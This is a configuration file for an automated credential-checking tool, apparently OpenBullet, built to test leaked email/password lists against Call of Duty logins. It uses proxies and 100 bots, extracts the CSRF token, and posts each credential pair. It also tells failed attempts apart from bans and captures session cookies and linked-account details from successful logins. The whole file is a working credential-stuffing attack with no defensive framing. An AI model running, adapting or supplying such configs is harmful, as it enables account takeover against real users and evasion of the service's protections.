[SETTINGS]
{
  "Name": "COD Config | Capture Linked",
  "SuggestedBots": 100,
  "LastModified": "2018-10-28T08:45:00.1853166+00:00",
  "AdditionalInfo": "No Capture Until friend wakes up",
  "Author": "TomKirkman",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://profile.callofduty.com/cod/login?" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "name=\"_csrf\" content=\"" "\"/>" Recursive=FALSE -> VAR "TOKEN" "" "" 
REQUEST POST "https://profile.callofduty.com/do_login?new_SiteId=cod" AutoRedirect=FALSE 
  CONTENT "username=<USER>&remember_me=true&password=<PASS>&_csrf=<TOKEN>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "SSO_REDIRECTED_AT_LOGIN=https: //www.callofduty.com/" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.102 Safari/537.36 Vivaldi/2.0.1309.37" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://profile.callofduty.com/cod/login?redirectUrl=https%3A%2F%2Fwww.callofduty.com%2F" 
  HEADER "Origin: https://profile.callofduty.com" 
  HEADER "Connection: keep-alive" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "<HEADERS(*)>" Contains "/cod/login?failure=true" 
  KEYCHAIN Ban OR 
    KEY "You don't have permission to access \"http://profile.callofduty.com/do_login?\" on this server." 
REQUEST GET "https://profile.callofduty.com/cod/info" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<COOKIES(pgacct)>" LR "" "" Recursive=FALSE -> CAP "pgacct" "" "" 
PARSE "<SOURCE>" LR "<input type=\"checkbox\" value=\"true\" data-accounttype=\"" "\" checked />" Recursive=TRUE -> CAP "AccountLinked" "" "" 
